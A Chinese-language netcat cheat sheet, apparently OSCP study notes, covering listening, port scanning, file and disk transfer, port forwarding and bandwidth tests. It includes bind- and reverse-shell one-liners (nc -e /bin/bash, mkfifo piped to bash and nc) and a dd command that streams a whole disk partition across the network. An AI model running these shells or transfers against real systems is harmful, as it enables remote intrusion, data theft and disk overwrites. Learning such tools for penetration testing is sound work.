功能
监听本地端口
连接目标端口
传送文件
Remote Administration with Netcat(OSCP 中给的分类, 不知道此分类的作用, 需要深入学习)
反弹 shell
测两台机器间的网速
监听本地端口
- # 临时监听端口
- nc -l <PORT> # 临时监听 TCP 端口一次
- nc -lu <PORT> # 临时监听 UDP 端口
- # 以监听 TCP 端口为例, 监听 UDP 端口基本一样
服务器端临时 监听端口
客户端尝试连接服务器端
建立 TCP 连接
客户端断开连接时, 服务器端也关闭端口的监听
- nc -lk <PORT> #永久监听 TCP 端口
- nc -lku <PORT> #永久监听 UDP 端口
- # 永久监听: 监听端口, 并且客户端端来连接时, 服务器端依旧监听等待连接; 并且支持多客户端同时连接 UDP 端口类似
连接目标端口
- # 在监听部分可以找到连接的图, 接下来重点操作一下端口扫描; nc 扫描端口会创建 TCP 三次握手连接, 会造成一定的流量, 容易被发现
- nc <IP> <PORT> # 连接目标 TCP 端口
- nc -u <IP> <PORT> # 连接目标 UDP 端口
- # 使用上述命令连接 tcp 或 UDP 端口, 连接成功后会阻塞在用户输入中, 让用户与目标端口进行交互此外还有一种非交互模式, 适合用来扫描端口
- nc -z <IP> <PORT> #扫描目标 TCP 端口
- nc -zu <IP> <PORT> # 扫描目标 UDP 端口
- # -w 参数的适用场景: 扫描 UDP 端口; 网络状况不好在网络状况良好是, 扫描 TCP 端口没有必要使用此参数
- nc -z -w1 <IP> <PORT> range
传送文件
此部分需要两台机器的配合
A 机: 数据存储机器
B 机: 备份机器
TCP 传送文件
- B: nc -l <PORT> > filename
- A: nc <IP> <PORT> < filename
文件传送完成后, 连接自动断开
UDP 传送文件
- #B
- nc -lu <PORT> > filename
- #A
- nc -u <IP> <PORT> < filename
- # 文件传输完成后, 连接不会断开, 可反复连接 B 机进行文件传输
- # UDP 更适合做一个日志接受端, 其他的机器都把通过 nc 把日志写入到监听的 UDP 机器上
传送目录
- # 传送目录与传送文件是一样的, 只是通过 tar 将目录打包为压缩文件传过去并自定 tar 解包, 实现传送目录的功能
- #B
- nc -l <PORT> | tar zxvf -
- #A
- tar zcf - * | nc <IP> <PORT>
传送分区
- B: nc -l <PORT> | dd of=/dev/sda
- A: dd if=/dev/sda | nc <IP> <PORT>
反弹 shell
- # nc 有 - e 选项时
- #server
- nc -l <PORT> -e /bin/bash -i
- #client
- nc <IP> <PORT>
- # nc 没有 - e 选项时, 创建正向 shell
- #server
- mkfifo /tmp/fifo && cat /tmp/fifo | /bin/bash -i 2>&1 | nc -l <PORT> > /tmp/fifo
- #client
- nc <IP> <PORT>
- # 创建反向 shell(服务器端连接客户端, 然后受客户端控制)
- #client:
- nc <IP> <PORT>
- #server:
- mkfifo /tmp/fifo && cat /tmp/fifo | /bin/bash -i 2>&1 | nc <IP> <PORT> > /tmp/fifo && rm -rf /tmp/fifo
端口转发
- # server
- nc -l <target port>
- mkfifo /tmp/fifo && cat /tmp/fifo | nc localhost <target port> | nc -l <listen port> > /tmp/fifo
- # client
- nc -n <IP> <listen port>
测机器间网速
- A: nc -l <PORT> >/dev/null
- B: nc <IP> <PORT> < /dev/zero
- AB:watch -n 1 "/sbin/ifconfig <interface> | grep bytes"
参考文章
来源: http://www.bubuko.com/infodetail-2512034.html